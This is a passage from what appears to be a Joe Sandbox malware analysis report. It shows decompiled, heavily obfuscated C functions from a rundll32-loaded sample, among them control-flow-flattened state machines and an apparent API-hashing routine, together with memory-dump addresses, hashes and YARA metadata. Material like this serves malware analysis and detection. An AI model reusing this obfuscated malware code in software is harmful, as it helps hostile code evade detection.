				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E0079AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E0079AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E00797FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}
































                                                                                                                          0x0079434d
                                                                                                                          0x00794351
                                                                                                                          0x00794353
                                                                                                                          0x00794357
                                                                                                                          0x00794358
                                                                                                                          0x00794359
                                                                                                                          0x0079435e
                                                                                                                          0x00794366
                                                                                                                          0x0079436b
                                                                                                                          0x0079436d
                                                                                                                          0x00794371
                                                                                                                          0x00794376
                                                                                                                          0x00794384
                                                                                                                          0x00794389
                                                                                                                          0x0079438f
                                                                                                                          0x00794397
                                                                                                                          0x0079439f
                                                                                                                          0x007943a4
                                                                                                                          0x007943ac
                                                                                                                          0x007943b8
                                                                                                                          0x007943bd
                                                                                                                          0x007943c3
                                                                                                                          0x007943c8
                                                                                                                          0x007943d0
                                                                                                                          0x007943d8
                                                                                                                          0x007943e5
                                                                                                                          0x007943e8
                                                                                                                          0x007943ec
                                                                                                                          0x007943f4
                                                                                                                          0x007943fc
                                                                                                                          0x0079440c
                                                                                                                          0x00794410
                                                                                                                          0x00794418
                                                                                                                          0x00794420
                                                                                                                          0x00794428
                                                                                                                          0x00794430
                                                                                                                          0x0079443c
                                                                                                                          0x00794441
                                                                                                                          0x00794447
                                                                                                                          0x0079444f
                                                                                                                          0x00794457
                                                                                                                          0x0079445f
                                                                                                                          0x00794467
                                                                                                                          0x0079446f
                                                                                                                          0x00794477
                                                                                                                          0x0079447f
                                                                                                                          0x00794487
                                                                                                                          0x0079448f
                                                                                                                          0x00794497
                                                                                                                          0x0079449f
                                                                                                                          0x007944a7
                                                                                                                          0x007944ac
                                                                                                                          0x007944b4
                                                                                                                          0x007944c0
                                                                                                                          0x007944c3
                                                                                                                          0x007944c7
                                                                                                                          0x007944cc
                                                                                                                          0x007944d9
                                                                                                                          0x007944e6
                                                                                                                          0x007944ee
                                                                                                                          0x007944f6
                                                                                                                          0x007944fe
                                                                                                                          0x0079450b
                                                                                                                          0x0079450f
                                                                                                                          0x00794517
                                                                                                                          0x0079451f
                                                                                                                          0x00794527
                                                                                                                          0x0079452f
                                                                                                                          0x00794534
                                                                                                                          0x0079453c
                                                                                                                          0x00794544
                                                                                                                          0x0079454c
                                                                                                                          0x00794554
                                                                                                                          0x0079455c
                                                                                                                          0x0079455c
                                                                                                                          0x00794566
                                                                                                                          0x007945bd
                                                                                                                          0x007945e3
                                                                                                                          0x007945e8
                                                                                                                          0x007945ed
                                                                                                                          0x007945ef
                                                                                                                          0x00000000
                                                                                                                          0x007945ef
                                                                                                                          0x00794568
                                                                                                                          0x0079456e
                                                                                                                          0x007945b9
                                                                                                                          0x00000000
                                                                                                                          0x00794570
                                                                                                                          0x00794576
                                                                                                                          0x00000000
                                                                                                                          0x0079457c
                                                                                                                          0x0079457c
                                                                                                                          0x007945a1
                                                                                                                          0x007945ad
                                                                                                                          0x007945ad
                                                                                                                          0x00794576
                                                                                                                          0x0079456e
                                                                                                                          0x007945b0
                                                                                                                          0x007945b8
                                                                                                                          0x007945b8
                                                                                                                          0x00794606
                                                                                                                          0x00794607
                                                                                                                          0x0079460d
                                                                                                                          0x00794613
                                                                                                                          0x0079461f
                                                                                                                          0x00000000
                                                                                                                          0x00794615
                                                                                                                          0x00794615
                                                                                                                          0x00000000
                                                                                                                          0x00794615
                                                                                                                          0x00000000
                                                                                                                          0x00794624
                                                                                                                          0x00794624
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                          • Instruction ID: 68fd74ad56c03007515950246381e73fe68fdcd5f2e238baa995c6302c346a10
                                                                                                                          • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                          • Instruction Fuzzy Hash: 277153B2109341AFD758CF61D98982BBBF1EBD9718F10890CF29556260D3B6C919CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A894B Relevance: .1, Instructions: 128COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007A894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E00793DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E00792A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E007AD97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

























                                                                                                                          0x007a8952
                                                                                                                          0x007a8956
                                                                                                                          0x007a8958
                                                                                                                          0x007a895a
                                                                                                                          0x007a895e
                                                                                                                          0x007a8962
                                                                                                                          0x007a8966
                                                                                                                          0x007a8967
                                                                                                                          0x007a8968
                                                                                                                          0x007a896d
                                                                                                                          0x007a8975
                                                                                                                          0x007a897e
                                                                                                                          0x007a8980
                                                                                                                          0x007a8987
                                                                                                                          0x007a898c
                                                                                                                          0x007a8992
                                                                                                                          0x007a8997
                                                                                                                          0x007a899f
                                                                                                                          0x007a89a7
                                                                                                                          0x007a89af
                                                                                                                          0x007a89b7
                                                                                                                          0x007a89bf
                                                                                                                          0x007a89c7
                                                                                                                          0x007a89cc
                                                                                                                          0x007a89d8
                                                                                                                          0x007a89dd
                                                                                                                          0x007a89e3
                                                                                                                          0x007a89eb
                                                                                                                          0x007a89f3
                                                                                                                          0x007a89fb
                                                                                                                          0x007a8a03
                                                                                                                          0x007a8a10
                                                                                                                          0x007a8a13
                                                                                                                          0x007a8a17
                                                                                                                          0x007a8a1f
                                                                                                                          0x007a8a27
                                                                                                                          0x007a8a34
                                                                                                                          0x007a8a38
                                                                                                                          0x007a8a3d
                                                                                                                          0x007a8a45
                                                                                                                          0x007a8a55
                                                                                                                          0x007a8a59
                                                                                                                          0x007a8a61
                                                                                                                          0x007a8a69
                                                                                                                          0x007a8a75
                                                                                                                          0x007a8a7d
                                                                                                                          0x007a8a81
                                                                                                                          0x007a8a89
                                                                                                                          0x007a8a91
                                                                                                                          0x007a8a99
                                                                                                                          0x007a8aa1
                                                                                                                          0x007a8aa6
                                                                                                                          0x007a8aae
                                                                                                                          0x007a8aae
                                                                                                                          0x007a8abc
                                                                                                                          0x007a8b33
                                                                                                                          0x007a8b38
                                                                                                                          0x007a8b3b
                                                                                                                          0x00000000
                                                                                                                          0x007a8abe
                                                                                                                          0x007a8ac4
                                                                                                                          0x007a8b0e
                                                                                                                          0x007a8b13
                                                                                                                          0x007a8b16
                                                                                                                          0x007a8b18
                                                                                                                          0x007a8b1a
                                                                                                                          0x00000000
                                                                                                                          0x007a8b1a
                                                                                                                          0x007a8ac6
                                                                                                                          0x007a8ac6
                                                                                                                          0x007a8acc
                                                                                                                          0x00000000
                                                                                                                          0x007a8ace
                                                                                                                          0x007a8ae2
                                                                                                                          0x007a8aef
                                                                                                                          0x007a8aef
                                                                                                                          0x007a8acc
                                                                                                                          0x007a8ac4
                                                                                                                          0x007a8af3
                                                                                                                          0x007a8afb
                                                                                                                          0x007a8afb
                                                                                                                          0x007a8b45
                                                                                                                          0x007a8b47
                                                                                                                          0x007a8b47
                                                                                                                          0x007a8b47
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                          • Instruction ID: 30da9e71220394c0e4f974bb964a0a04f2f3727426bd8f6aaf14ea5763fbc8a3
                                                                                                                          • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                          • Instruction Fuzzy Hash: 01518B71108301AFC794CF22D98581BBBE5FBD8748F508A2EF59596120D776CA19CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AAC3A Relevance: .1, Instructions: 89COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E007AAC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E0079474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E007AC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

















                                                                                                                          0x007aac3a
                                                                                                                          0x007aac3a
                                                                                                                          0x007aac3d
                                                                                                                          0x007aac47
                                                                                                                          0x007aac4f
                                                                                                                          0x007aac5e
                                                                                                                          0x007aac68
                                                                                                                          0x007aac6c
                                                                                                                          0x007aac6e
                                                                                                                          0x007aac76
                                                                                                                          0x007aac78
                                                                                                                          0x007aac80
                                                                                                                          0x007aac88
                                                                                                                          0x007aac90
                                                                                                                          0x007aac98
                                                                                                                          0x007aaca0
                                                                                                                          0x007aacab
                                                                                                                          0x007aacb8
                                                                                                                          0x007aacbc
                                                                                                                          0x007aacc4
                                                                                                                          0x007aaccc
                                                                                                                          0x007aacd4
                                                                                                                          0x007aacdc
                                                                                                                          0x007aace4
                                                                                                                          0x007aacec
                                                                                                                          0x007aacf4
                                                                                                                          0x007aacfe
                                                                                                                          0x007aad02
                                                                                                                          0x007aad0a
                                                                                                                          0x007aad17
                                                                                                                          0x007aad1b
                                                                                                                          0x007aad20
                                                                                                                          0x007aad28
                                                                                                                          0x007aad35
                                                                                                                          0x007aad39
                                                                                                                          0x007aad3e
                                                                                                                          0x007aad43
                                                                                                                          0x007aad4b
                                                                                                                          0x007aad4b
                                                                                                                          0x007aad51
                                                                                                                          0x007aad8a
                                                                                                                          0x007aad8b
                                                                                                                          0x007aad8c
                                                                                                                          0x007aad91
                                                                                                                          0x007aad94
                                                                                                                          0x007aad96
                                                                                                                          0x00000000
                                                                                                                          0x007aad53
                                                                                                                          0x007aad55
                                                                                                                          0x00000000
                                                                                                                          0x007aad57
                                                                                                                          0x007aad72
                                                                                                                          0x007aad72
                                                                                                                          0x007aad55
                                                                                                                          0x007aad74
                                                                                                                          0x007aad7d
                                                                                                                          0x007aad7d
                                                                                                                          0x007aad9a
                                                                                                                          0x007aad9c
                                                                                                                          0x007aad9c
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                          • Instruction ID: 76c69c35d006a96e35e02880d03cec213c1fab64d1a187a855d5e04acc34b322
                                                                                                                          • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                          • Instruction Fuzzy Hash: EB3175725083019BC314CF25D88940BFBE0FBD9788F108A1DF599A7220D379DA49CB97
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00798969 Relevance: .1, Instructions: 84COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00798969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E007A20B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E007AD25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E007A0AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E007980E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}


















                                                                                                                          0x00798971
                                                                                                                          0x00798974
                                                                                                                          0x00798976
                                                                                                                          0x00798979
                                                                                                                          0x0079897b
                                                                                                                          0x00798980
                                                                                                                          0x00798986
                                                                                                                          0x0079898a
                                                                                                                          0x00798991
                                                                                                                          0x00798998
                                                                                                                          0x007989a5
                                                                                                                          0x007989a6
                                                                                                                          0x007989a9
                                                                                                                          0x007989b0
                                                                                                                          0x007989b7
                                                                                                                          0x007989be
                                                                                                                          0x007989c5
                                                                                                                          0x007989cc
                                                                                                                          0x007989d7
                                                                                                                          0x007989da
                                                                                                                          0x007989e1
                                                                                                                          0x007989ed
                                                                                                                          0x007989f0
                                                                                                                          0x007989f7
                                                                                                                          0x00798a02
                                                                                                                          0x00798a05
                                                                                                                          0x00798a0c
                                                                                                                          0x00798a0f
                                                                                                                          0x00798a16
                                                                                                                          0x00798a21
                                                                                                                          0x00798a28
                                                                                                                          0x00798a2b
                                                                                                                          0x00798a32
                                                                                                                          0x00798a39
                                                                                                                          0x00798a40
                                                                                                                          0x00798a44
                                                                                                                          0x00798a4b
                                                                                                                          0x00798a58
                                                                                                                          0x00798a5d
                                                                                                                          0x00798a64
                                                                                                                          0x00798a6b
                                                                                                                          0x00798a72
                                                                                                                          0x00798a79
                                                                                                                          0x00798a7d
                                                                                                                          0x00798a84
                                                                                                                          0x00798a97
                                                                                                                          0x00798a9c
                                                                                                                          0x00798aa2
                                                                                                                          0x00798aa7
                                                                                                                          0x00798aa8
                                                                                                                          0x00798aa9
                                                                                                                          0x00798aab
                                                                                                                          0x00798ab5
                                                                                                                          0x00798abe

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                          • Instruction ID: 3b1f54c03eec0d48beeef39d085e702e891160ababedfe0a7b9490b9bc77f0f6
                                                                                                                          • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                          • Instruction Fuzzy Hash: B941CD75C0121AEBCF18CFE5CA8A9EEBFB0FB44314F108199D525AA260D3B95B45CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007ADBEA Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007ADBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E007A20B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}












                                                                                                                          0x007adbf1
                                                                                                                          0x007adbf4
                                                                                                                          0x007adbf6
                                                                                                                          0x007adbf9
                                                                                                                          0x007adbfc
                                                                                                                          0x007adbfe
                                                                                                                          0x007adc03
                                                                                                                          0x007adc0a
                                                                                                                          0x007adc10
                                                                                                                          0x007adc17
                                                                                                                          0x007adc1e
                                                                                                                          0x007adc25
                                                                                                                          0x007adc2c
                                                                                                                          0x007adc33
                                                                                                                          0x007adc3a
                                                                                                                          0x007adc46
                                                                                                                          0x007adc49
                                                                                                                          0x007adc4c
                                                                                                                          0x007adc50
                                                                                                                          0x007adc57
                                                                                                                          0x007adc5e
                                                                                                                          0x007adc65
                                                                                                                          0x007adc69
                                                                                                                          0x007adc70
                                                                                                                          0x007adc74
                                                                                                                          0x007adc7e
                                                                                                                          0x007adc82
                                                                                                                          0x007adc87
                                                                                                                          0x007adc95
                                                                                                                          0x007adc98
                                                                                                                          0x007adc9c
                                                                                                                          0x007adca3
                                                                                                                          0x007adcb0
                                                                                                                          0x007adcb7
                                                                                                                          0x007adcbb
                                                                                                                          0x007adcc2
                                                                                                                          0x007adcc6
                                                                                                                          0x007adcd8
                                                                                                                          0x007adcdb
                                                                                                                          0x007adce0
                                                                                                                          0x007adce3
                                                                                                                          0x007adce6
                                                                                                                          0x007adce7
                                                                                                                          0x007adce8
                                                                                                                          0x007adcee
                                                                                                                          0x007adcf6

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                          • Instruction ID: 20515d2192786a14aac6848d8a8d595488d8d97de1bb1d05443f7f06c35582b5
                                                                                                                          • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                          • Instruction Fuzzy Hash: 68311171D02348EBDF06DFA8CA4A2DEBBB0EF45314F208099D501A7265D3B14B98EF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00799011 Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
